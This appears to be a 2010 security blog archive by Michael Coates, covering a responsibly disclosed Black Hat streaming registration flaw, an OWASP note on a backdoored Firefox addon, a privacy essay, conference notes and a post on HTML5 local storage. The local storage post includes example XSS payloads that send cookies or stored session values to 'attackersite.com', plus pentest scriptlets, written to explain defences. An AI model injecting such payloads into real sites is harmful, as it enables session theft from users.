Wednesday, July 28, 2010

The Irony - Black Hat Video Stream Hack

 Free access to the Black Hat Video Stream? Yep, that was the case.  Read on for the whole story.

I was unable to attend Black Hat in person this year. Instead, I decided I would closely monitor twitter, blogs and the Black Hat page itself to stay up to date. In this process I noticed the new "Black Hat Uplink" service that would allow remote individuals access to streaming Black Hat talks from two select tracks. Great! Now I could watch some talks even though I wasn't there. This sounded perfect and I began the registration process.

However, during registration I was quickly sidetracked by a few oddities in the design. Long story short, I identified a series of flaws that would enable the creation of an account with only providing an email address (e.g. no name, address, phone etc) and I was never asked to enter any credit card data.  Odd I thought, perhaps you enter the credit card info upon your first login.  The only problem was that I didn't actually have a registration email with a link to the login page.  A few select Google searches and I ended up on a relatively vanilla looking login page.  I have a username and a key, let's give it a shot.  To my surprise the login was accepted and I was now sitting in front of the live Black Hat video stream.

This is certainly not the intended outcome of the registration app. I was never prompted to enter my credit card number. Black Hat is charging $395 for access to these streams and would not be pleased to find out that its possible to create an account for free.  Clearly my non-standard path through the registration app had identified a few key security flaws in their design.

Now, to be fair, Black Hat didn't operate this video service themselves. They used a third party for the video application.   But its still a bit ironic that the largest hacking conference in the world had this security hole in their video streaming service.

Screen Shots

Disclosure

You are hearing about this vulnerability because the identified flaw has already been fixed.  The disclosure debate is full of pros and cons, but my approach was to first attempt to get in touch with the system owners and give them reasonable time to address the issue.  The first problem was figuring out who to talk to.  A call to the Black Hat phone # went to voicemail (figures they are a bit busy) and my emails went unanswered.

I turned to twitter to find an answer.  I sent a few select tweets (@_mwc) asking for assistance and used the #blackhatusa tag too. Within 30 minutes the company in charge of the video app was messaging me directly. Another 30 minutes and I was on the phone with the person in charge. Not a bad response time.

From there we discussed the issue and I sent over my notes on how to recreate the "free" user. I was assured that this information would go straight to their developers and was of the highest priority. They weren't kidding, within 4 hours the issue was fixed and deployed live.

Overall Thoughts
  • Even the most security aware organization (BlackHat) can suffer security breaches. Systems are large and complex and adding in third party vendor systems can introduce new security weaknesses.
  • Any enterprise leveraging third party services must either validate the security of these service themselves or review the security reports provided by another qualified security organization.
  • Responsible / intelligent disclosure can work. In this case the company was responsive to the issue and eager to address the security concern
  • Security researchers enjoy working with companies that also care about security. I wanted to give the company a fair chance to fix the issue.  The ability to talk to someone with 1 hour of reporting the issue was very encouraging. Had things not gone so well I imagine I would be writing a very different blog post at this hour.

The actual vulnerability


A combination of logic flaws and misconfigured systems which provided access to a testing login page that could be used with user credentials that were not fully "registered" (e.g. no payment received).  I have a more detailed walk through of the vulnerability which I may release/present in the future.

-Michael Coates

Monday, July 26, 2010

BlackHat USA 2010 - Talk Selection

Here is the selection of talks I'll be looking forward to seeing. I won't be there in person, so don't worry if you can't seem to find me. One recurring compliant I have with black hat is that small focus on web application security. However, if you are looking to completely focus on web app sec, then you should be attending the OWASP conferences anyway.

Day 1 - 1115-1230 Val Smith, Colin Ames & Anthony Lai:
Balancing the Pwn Trade Deficit


Day 1 - 1345-1500 Neil Daswani:
mod_antimalware: A Novel Apache Module for Containing web-based Malware Infections

Day 1 - 1515 - 1630 Arshan Dabirsiaghi:
JavaSnoop: How to Hack Anything Written in Java
  • I've previewed this tool and it looks awesome. Make sure to check this out.
Day 1 - 1645 - 1800 Alex Hutton, Allison Miller:
Ushering in the Post-GRC World: Applied Threat Modeling
  • Probably not going to be earth shattering, but if you aren't doing threat modeling then you should see this and get your act together.
Day 2 - 1000 - 1100 Nathan Hamiel, Marcin Wielgoszewski:
Constricting the Web: Offensive Python for Web Hackers

Day 2 - 1115 - 1230 Robert Hansen, Josh Sokol:
HTTPS Can Byte Me


-Michael Coates

Thursday, July 15, 2010

OWASP's (non)role in the Backdoored Firefox Addon

You may have recently read about two addons that were removed from the Mozilla addon store. One due to malicious code that would steal passwords and the second due to an escalation vulnerability.

A few people have asked me about a statement that was made indicating that this addon was OWASP approved, or was on an OWASP recommended list.  This confusion seems to stem from the statement posted with this article

Hartmann told Netcraft:
"I was giving the OWASP Firefox Security Collection a try, installed a bundle of extensions unknown to me and started to have a look at a friend's online game from a security point of view. I started Burp Suite Pro in parallel to check what additional help I can get from the extensions, and to watch what they are doing."
OWASP does not actually maintain a Firefox Security Collection. Further investigation shows that the following link most likely explains the perceived relationship to OWASP.

In June of 2009 a post was made to the OWASP Phoenix chapter's local mailing list recommending a collection of Firefox addons. All of OWASP's mailing lists are public and anyone that joins the list can post.  The recommendation to try out this list was not made by OWASP but instead a member of the mailing list looking to help share information that he had found helpful
https://lists.owasp.org/pipermail/owasp-phoenix/2009-June/000090.html

Later, in June of 2010, the malicious addon made its way into that collection and was ultimately discovered by Johann-Peter Hartmann whereupon it was reported to Mozilla and quickly acted on.

Kudos to Johann for discovering the issue and promptly reporting it for resolution.  Hopefully this clears up the confusion regarding OWASP and the addon.

For any questions regarding the two addons I encourage you to visit the official blog post and respond with comments there




-Michael Coates

Tuesday, July 13, 2010

Automatic Opt-In Privacy Policy Changes - Your Privacy is Important to Us

Privacy continues to be an increasingly important discussion as the online and physical worlds merge.  The data that a user has online effectively tells the life story of an individual down to where they are at a given moment, what they will do next, and even who they will be meeting.

One of the many questions that must be discussed with privacy is the appropriate method of handling privacy policy changes.  This of course was a huge issue with the recent FaceBook policy changes. However, let's look at a different example.

I recently received a notice from Verizon Wireless that started with the following

Customer Proprietary Network Information Notice
Your privacy is important to us.
The document went on to clearly explain that Verizon wanted to provide my data to their affiliates, agents and parent companies for the purposes of finding out how to "better serve your telecommunication needs". The document explained what data would be included and provided and easy way to opt-out of the sharing.  So far so good, right?

Well, the problem I have is this. I need to opt-out. It seems that if someone wants to take or share something that is yours, then they should have to ask you for permission. Not the other way around. Simply sending a letter, which may not even reach the user, and indicating the user has to take action to prevent a company from using your data seems wrong.

This line of thinking could never be applied to material goods.  I could not send my neighbor a letter and indicate that I was going to take his car and share it with my friends unless he opted out.  Nor could I send Verizon a letter and indicate I would no longer be paying my bills unless they opted out of my "no more bill paying plan".

Clearly we can easily dismiss these ideas as far-fetched. But that is mostly because they involve a physical object that has clear ownership or involve something with an easy to understand monetary value (e.g. monthly bill). Based on that, then the only difference between my examples and data privacy is that we haven't clearly articulated the value of our data and privacy.

But our data does have value and companies are more than happy to farm this data for their profits.  Until we clearly define the value of our data and that we have the right to control it, big companies will continue with this practice of easily accessing and sharing our data under the guise of "your privacy is important to us"



-Michael Coates

Monday, July 12, 2010

HTML5, Local Storage, and XSS

A nice new feature of HTML 5 is local storage. Briefly, this is a client side storage option that can be easily accessed via JavaScript. The benefit of local storage over other client side storage options is that local storage allows more storage space than other options (cookies, flash obj, etc). In addition, unlike cookies, the data is not automatically appended to every request by the browser. This is a nice benefit for those attempting to minimize data transmission between the client and server.

However, there are a few security considerations that should be evaluated before completely jumping on board with local storage. 

XSS and Local Storage

A popular target of XSS attacks is the session identifier and possibly any sensitive data stored client side. Just like session IDs stored within cookies, a session id within local storage can be easily stolen by the attacker.
Example XSS to steal session ID from cookie
<script>document.write("<img src='http://attackersite.com?cookie="+document.cookie+"'>");</script>

Example XSS to steal session ID from local storage
<script>document.write("<img src='http://attackersite.com?cookie="+localStorage.getItem('foo')+"'>");
</script>

The syntax is easy, just access localStorage using "getItem" and reference the variable name holding the data. The only real difference here is the attacker would need to inspect the client side JavaScript to pick out the correct variable names to use.

HTTPOnly and Local Storage

Another problem with using local storage for session ids is the inability to apply the HTTPOnly flag that we use with cookies. The HTTPOnly flag instructs browsers to not allow JavaScript access to the cookies. This is a great additional layer of defense to prevent an XSS attack from stealing the user's session (of course lots of other damage is still possible via XSS).  Since local storage is intended to be accessed via JavaScript the idea of HTTPOnly is not compatible with this design. 

Notes for penetration testing:
Proof of concept XSS with local storage:
<script>alert(localStorage.getItem('foo'))</script>

Get a Local Storage Value via URL scriptlet
javascript:alert(localStorage.getItem('fooName'));

Set a Local Storage Value via URL scriptlet:
javascript:localStorage.setItem('fooName','barValue');

Set a Local Storage Value with JSON via URL scriptlet:
javascript:localStorage.setItem('fooName', JSON.stringify('data1:a,"data2":b,data3:c'));

Get Number of Local Storage Objects via URL scriptlet:
javascript:alert(localStorage.length);

Clearing all Local Storage associated with site:
javascript:localStorage.clear()
Final Thoughts on Local Storage and Security
1. Don't use local storage for session identifiers. Stick with cookies and use the HTTPOnly and Secure flags.
2. If cookies won't work for some reason, then use session storage which will be cleared when the user closes the browser window.
3. Be cautious with storing sensitive data in local storage. Just like any other client side storage options this data can be viewed and modified by the user.



-Michael Coates

Thursday, July 1, 2010

Notes from OWASP Bay Area Security Summit

I attended the OWASP Bay Area Security Summit today and wanted to share some notes from the talks.

Drive By Downloads- How to Avoid Getting A Cap Popped in your App - Neil Daswani, Co-founder, Dasient
- Lots of information in this talk. However the portion on dynamic identification and quarantine of malicious scripts was very interesting. Mod Anti-Malware was created which will analyze dynamic content within a webpage to determine if remotely linked content is malicious. If the remotely linked content is malicious then the mod will strip the include or src link to that content in real time.  The idea is pretty interesting and I can see it being applicable to help stop malicious JavaScript via ads.  Neil mentioned he'll be talking more about this at blackhat.

Building Secure Web Applications In a Cloud Services Environment - Misha Logvinov, VP of Online Operations, IronKey and Alex Bello
This was a talk on securing the SDLC that provided a good overall look at the SDLC and how security should be integrated into each phase.  Several OWASP resources were mentioned that can be used to assist in securing various portions of the SDLC including: ESAPI, ASVS, Top 10 and OpenSamm. The talk also touched on cloud services but really didn't dive into too much depth. During Q&A someone did ask how they should verify or test a cloud service providers security? The answer provided by Misha was to ask for proof in the following formats: SAS70, ISO 27001, or 3rd party penetration test reports.  This is a challenging issue and one that will need to be addressed as cloud services grows.  I think the ideas provided by Misha are a good starting point for the security conversation between the client and the cloud services  provider.

Cloudy with a Chance of Hack Lars Ewe, CTO and VP of Engineering, Cenzic

-Lars reviewed several statistics from Cenzic's Trend Reports on web application security. The data clearly showed, not to anyone's surprise, that there are still a large number of vulnerabilities in most web applications.  While the data was interesting, I did have some disagreements on the methodology. For example, Information Leakage was reported as the most prevalent vulnerability within property applications (Q3-Q4 report pg 10) and was reported as being present in 93% of all applications in the study (Q3-Q4 report pg 11). This percentage seemed a bit high and we soon found out why. Information leakage includes the standard things like detailed error messages, but also includes HTML comments (pg 15).  This explains why the results seemed off, any website with an HTML comment was dinged for Information Leakage.  The other statistic that I questioned was CSRF. The report states that CSRF is an issue in only 14% of applications (pg 11). This is an odd result because CSRF has been widely discussed as a tricky issue to automatically test for.  With that in mind, I'm confused how the report obtained some CSRF vulnerabilities but not the quantity we would expect.  In my experience nearly every site has CSRF flaws, so I'd expect a percentage between 85 and 90%.

These discrepancies made me think twice about the overall statistics and conclusions of the report. However, I shouldn't derail the issue too much. Any study will always have its limitations and biases.  And even if the methods used to collect data are slightly off, if they stay consistent then the trends over time do provide some value.  Either way, the overall point is clear - we still have a lot of work to do to clean up our applications.

Two other presentations were in the summit lineup. Unfortunately I did not have enough time in my schedule to catch these two talks.
 
Application Security Deployment Tradeoffs - Anoop Reddy, Senior Manager, Products, Citrix


MashUp SSL - Extending SSL for Security Mashups - Siddharth Bajaj, Principal Engineer, Verisign

In the bay area and interested in OWASP? Sign up on the mailing list for event notification.


-Michael Coates